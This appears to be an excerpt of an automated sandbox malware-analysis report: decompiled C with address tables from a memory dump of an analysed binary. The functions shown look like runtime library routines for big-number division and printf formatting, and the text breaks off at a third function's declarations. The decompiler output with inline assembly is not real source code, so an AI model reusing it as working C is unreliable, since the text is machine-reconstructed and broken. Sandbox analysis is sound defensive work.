				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00252290(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00252020(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00252120(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00252120(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x24df9d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00252020( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E0024A2FE(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E0024A2FE(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E0024A2FE(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x0024c98c
0x0024c98f
0x0024c993
0x0024c99d
0x0024c9a0
0x0024c9a2
0x0024c9a4
0x0024c9b1
0x0024c9b1
0x0024c9b4
0x0024c9b4
0x0024c9b7
0x0024c9ba
0x0024c9bc
0x0024caef
0x0024caf1
0x0024cb3a
0x0024cb3e
0x0024cb44
0x0024caf3
0x0024caf5
0x0024caf8
0x0024cafa
0x0024cafd
0x0024caff
0x0024cb01
0x0024cb35
0x0024cb35
0x0024cb35
0x0024cb03
0x0024cb08
0x0024cb0e
0x0024cb0e
0x0024cb11
0x0024cb13
0x0024cb15
0x00000000
0x00000000
0x0024cb17
0x0024cb18
0x0024cb1b
0x0024cb1e
0x0024cb20
0x00000000
0x0024cb22
0x00000000
0x0024cb22
0x00000000
0x0024cb20
0x0024cb24
0x0024cb2b
0x0024cb2f
0x0024cb33
0x00000000
0x00000000
0x0024cb33
0x0024cb36
0x0024cb36
0x0024cb38
0x0024cb45
0x0024cb48
0x0024cb4b
0x0024cb4e
0x0024cb4e
0x0024cb52
0x0024cb55
0x0024cb58
0x0024cb5b
0x0024cb66
0x0024cb5d
0x0024cb62
0x0024cb62
0x0024cb70
0x0024cb75
0x0024cb78
0x0024cb7a
0x0024cb84
0x0024cb87
0x0024cb8e
0x0024cb91
0x0024cb94
0x0024cb9c
0x0024cba2
0x0024cba2
0x0024cba2
0x0024cba2
0x0024cb94
0x0024cba7
0x0024cbae
0x0024cbae
0x0024cbb1
0x0024cbb4
0x0024cde6
0x0024cde6
0x0024cbba
0x0024cbba
0x0024cbc0
0x0024cbc3
0x0024cbc6
0x0024cbc9
0x0024cbcc
0x0024cbcf
0x0024cbd2
0x0024cbd2
0x0024cbd5
0x0024cbdc
0x0024cbdc
0x0024cbd7
0x0024cbd7
0x0024cbd7
0x0024cbde
0x0024cbe2
0x0024cbe5
0x0024cbe7
0x0024cbea
0x0024cbf1
0x0024cbf4
0x0024cbf7
0x0024cc02
0x0024cc05
0x0024cc0a
0x0024cc0f
0x0024cc16
0x0024cc1b
0x0024cc1d
0x0024cc1f
0x0024cc23
0x0024cc26
0x0024cc29
0x0024cc31
0x0024cc3a
0x0024cc3a
0x0024cc3c
0x0024cc3f
0x0024cc3f
0x0024cc29
0x0024cc49
0x0024cc4e
0x0024cc53
0x0024cc55
0x0024cc58
0x0024cc5a
0x0024cc5d
0x0024cc60
0x0024cc62
0x0024cc65
0x0024cc68
0x0024cc6a
0x0024cc71
0x0024cc76
0x0024cc79
0x0024cc83
0x0024cc85
0x0024cc87
0x0024cc8a
0x0024cc8a
0x0024cc8c
0x0024cc8f
0x0024cc92
0x0024cc95
0x0024cc98
0x0024cc6c
0x0024cc6c
0x0024cc6f
0x00000000
0x00000000
0x0024cc6f
0x0024cc9b
0x0024cc9d
0x0024cc9f
0x00000000
0x0024cca1
0x0024cca1
0x0024cca4
0x0024cca6
0x0024cca6
0x0024ccb4
0x0024ccb7
0x0024ccbc
0x0024ccbe
0x00000000
0x00000000
0x0024ccc0
0x0024ccc7
0x0024ccc7
0x0024ccca
0x0024cccd
0x0024ccd0
0x0024ccd3
0x0024ccd3
0x0024ccd6
0x0024ccd9
0x0024ccdd
0x0024cce0
0x0024cce2
0x0024cce5
0x00000000
0x00000000
0x0024cce7
0x0024cce5
0x0024ccc2
0x0024ccc2
0x0024ccc5
0x00000000
0x00000000
0x00000000
0x00000000
0x0024ccc5
0x0024ccec
0x0024ccec
0x00000000
0x0024ccec
0x0024cce9
0x00000000
0x0024cce9
0x0024cca4
0x0024cc9f
0x0024ccef
0x0024ccef
0x0024ccf1
0x0024ccfb
0x0024ccfb
0x0024ccfe
0x0024cd00
0x0024cd02
0x0024cd04
0x0024cd09
0x0024cd0c
0x0024cd0c
0x0024cd0f
0x0024cd12
0x0024cd15
0x0024cd17
0x0024cd2c
0x0024cd2e
0x0024cd30
0x0024cd32
0x0024cd34
0x0024cd36
0x0024cd38
0x0024cd3a
0x0024cd3d
0x0024cd3d
0x0024cd41
0x0024cd43
0x0024cd49
0x0024cd4c
0x0024cd4c
0x0024cd4c
0x0024cd50
0x0024cd50
0x0024cd55
0x0024cd58
0x0024cd58
0x0024cd5d
0x0024cd5f
0x0024cd61
0x0024cd68
0x0024cd68
0x0024cd6a
0x0024cd6f
0x0024cd71
0x0024cd74
0x0024cd74
0x0024cd77
0x0024cd80
0x0024cd80
0x0024cd82
0x0024cd82
0x0024cd87
0x0024cd8d
0x0024cd91
0x0024cd94
0x0024cd97
0x0024cd99
0x0024cd99
0x0024cd99
0x0024cd9e
0x0024cd9e
0x0024cda1
0x0024cda4
0x0024cd63
0x0024cd63
0x0024cd66
0x00000000
0x00000000
0x0024cd66
0x0024cd61
0x0024cdab
0x0024cdab
0x0024cdac
0x0024ccf3
0x0024ccf3
0x0024ccf5
0x00000000
0x00000000
0x0024ccf5
0x0024cdbc
0x0024cdc1
0x0024cdc4
0x0024cdc8
0x0024cdc9
0x0024cdcc
0x0024cdcf
0x0024cdd0
0x0024cdd3
0x0024cdd6
0x0024cdd9
0x0024cddc
0x0024cddc
0x0024cde4
0x0024cdeb
0x0024cdec
0x0024cdee
0x0024cdf0
0x0024cdf2
0x0024cdf5
0x0024ce00
0x0024ce00
0x0024ce06
0x0024ce06
0x0024ce09
0x0024ce0a
0x0024ce0a
0x0024ce00
0x0024ce0e
0x0024ce10
0x0024ce12
0x0024ce14
0x0024ce14
0x0024ce16
0x0024ce1a
0x00000000
0x00000000
0x0024ce1c
0x0024ce1c
0x0024ce1f
0x0024ce21
0x00000000
0x00000000
0x00000000
0x0024ce21
0x0024ce14
0x0024ce23
0x0024ce2d
0x00000000
0x00000000
0x00000000
0x0024cb38
0x0024c9c2
0x0024c9c2
0x0024c9c2
0x0024c9c5
0x0024c9c8
0x0024c9cb
0x0024c9fc
0x0024c9fe
0x0024ca49
0x0024ca4b
0x0024ca52
0x0024ca59
0x0024ca5c
0x0024ca5f
0x0024ca65
0x0024ca65
0x0024ca66
0x0024ca69
0x0024ca70
0x0024ca79
0x0024ca7e
0x0024ca81
0x0024ca86
0x0024ca89
0x0024ca8b
0x0024ca90
0x0024ca93
0x0024ca96
0x0024ca96
0x0024ca96
0x0024ca9a
0x0024ca9d
0x0024ca9d
0x0024caa2
0x0024caa2
0x0024caad
0x0024cab8
0x0024cab8
0x0024cabb
0x0024cac7
0x0024cacc
0x0024cad7
0x0024cad9
0x0024cadb
0x0024cae1
0x0024cae6
0x0024cae8
0x0024caee
0x0024ca00
0x0024ca0c
0x0024ca0c
0x0024ca0f
0x0024ca1f
0x0024ca25
0x0024ca2c
0x0024ca2e
0x0024ca36
0x0024ca38
0x0024ca3a
0x0024ca3f
0x0024ca42
0x0024ca48
0x0024ca48
0x0024c9cd
0x0024c9d0
0x0024c9d4
0x0024c9da
0x0024c9e9
0x0024c9f3
0x0024c9fb
0x0024c9fb
0x0024c9cb
0x0024c9a6
0x0024c9a9
0x0024c9af
0x0024c9af
0x0024c995
0x0024c99b
0x0024c99b

APIs

__aulldvrm.INT64 ref: 0024CA79
__aulldvrm.INT64 ref: 0024CC49

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00244D84, Relevance: .2, Instructions: 237
Crypto

C-Code - Quality: 83%

			E00244D84(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
				_t52 =  *0x25b018; // 0x6083b07a
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E002454CB(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E00243541(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E00244754(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E0024566A(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E00244754(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E002455DF(_t135, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00244754(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E002452D6(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E002454B3(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E002450CC(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00245420(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00245494(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E00245069(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E0024523E(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00244d84
0x00244d8c
0x00244d93
0x00244d98
0x00244d9a
0x00244d9e
0x00244da1
0x00244da5
0x00244da6
0x00244da9
0x00244e16
0x00244e19
0x00244e68
0x00244e68
0x00244e6b
0x00244dd7
0x00244dd9
0x00244dde
0x00244de0
0x00244e86
0x00244e89
0x00244fcf
0x00244fd1
0x00244fe0
0x00244fe0
0x00244e8f
0x00244e94
0x00244e97
0x00244e9a
0x00244e9e
0x00244ea4
0x00244ea5
0x00244ea7
0x00244ed1
0x00244ed1
0x00244ed5
0x00244ed8
0x00244ee2
0x00244ee4
0x00244ee7
0x00244ee9
0x00244eef
0x00244eef
0x00244ef1
0x00244ef1
0x00244ef4
0x00244f02
0x00244f02
0x00244f04
0x00244f06
0x00244f07
0x00244f09
0x00244f0f
0x00244f11
0x00244f12
0x00244f17
0x00244f1a
0x00244f28
0x00244f28
0x00244f2a
0x00244f2a
0x00244f35
0x00244f37
0x00244f3c
0x00244f3c
0x00244f3f
0x00244f45
0x00244f47
0x00244f4a
0x00244f5a
0x00244f5f
0x00244f5f
0x00244f74
0x00244f79
0x00244f7c
0x00244f81
0x00244f84
0x00244f86
0x00244f88
0x00244f8b
0x00244f8e
0x00244f9b
0x00244fa0
0x00244fa0
0x00244f8e
0x00244fa7
0x00244fac
0x00244faf
0x00244fb4
0x00244fb7
0x00244fb9
0x00244fc6
0x00244fcb
0x00244fb9
0x00000000
0x00244fce
0x00244f1e
0x00244f1f
0x00244f22
0x00000000
0x00000000
0x00244f24
0x00000000
0x00244f24
0x00244f0b
0x00244f0d
0x00000000
0x00000000
0x00000000
0x00244f0d
0x00244ef8
0x00244ef9
0x00244efc
0x00000000
0x00000000
0x00244efe
0x00000000
0x00244efe
0x00000000
0x00244eeb
0x00244edc
0x00244edd
0x00244ee0
0x00000000
0x00000000
0x00000000
0x00244ee0
0x00244eab
0x00244eae
0x00244eb0
0x00244ebb
0x00244ebd
0x00244ec5
0x00244ec7
0x00244ec9
0x00000000
0x00000000
0x00244ecb
0x00244ecf
0x00244ecf
0x00000000
0x00244ecf
0x00244ebf
0x00244eb4
0x00244eb4
0x00244eb5
0x00000000
0x00244eb5
0x00244eb2
0x00000000
0x00244eb2
0x00244de6
0x00000000
0x00244de6
0x00244e72
0x00244e72
0x00244e75
0x00244e47
0x00244e47
0x00244e48
0x00244e4a
0x00244e4c
0x00000000
0x00244e4c
0x00244e77
0x00244e7a
0x00000000
0x00000000
0x00244e80
0x00244def
0x00244def
0x00000000
0x00244def
0x00244e1b
0x00244e5e
0x00000000
0x00244e5e
0x00244e1d
0x00244e20
0x00244e53
0x00244e55
0x00000000
0x00244e55
0x00244e22
0x00244e25
0x00244e43
0x00244e43
0x00244e43
0x00244e43
0x00000000
0x00244e43
0x00244e27
0x00244e2a
0x00244e3c
0x00000000
0x00244e3c
0x00244e2c
0x00244e2f
0x00000000
0x00000000
0x00244e33
0x00000000
0x00244e33
0x00244dab
0x00000000
0x00000000
0x00244db1
0x00244db3
0x00244df3
0x00244df3
0x00244df6
0x00244e0f
0x00000000
0x00244e0f
0x00244df8
0x00244df8
0x00244dfb
0x00000000
0x00000000
0x00244dfe
0x00244e01
0x00000000
0x00000000
0x00244e03
0x00244e06
0x00000000
0x00244e06
0x00244db5
0x00244ded
0x00000000
0x00244ded
0x00244db9
0x00000000
0x00000000
0x00244dc2
0x00000000
0x00000000
0x00244dc7
0x00000000
0x00000000
0x00244dcc
0x00000000
0x00000000
0x00244dd5
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 002410CD, Relevance: 13.7, APIs: 9, Instructions: 184
string

C-Code - Quality: 100%

			E002410CD(void* __edx, void* __eflags, intOrPtr _a4) {
				signed short* _v8;
				void* _v12;
				signed short* _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __edi;
				void* __esi;
				intOrPtr _t54;
				WCHAR* _t58;
				signed short _t60;
				short _t61;
				signed int _t63;
				signed short _t64;
				short _t65;
				short _t66;
				signed short _t67;
				signed short _t76;
				short _t77;
				short _t78;
				signed short _t79;
				signed int _t80;
				signed short _t82;
				intOrPtr _t83;
				signed short* _t84;
				signed short* _t89;
				WCHAR* _t92;
				WCHAR* _t95;
				signed int _t96;
				signed int _t97;
				signed short* _t100;
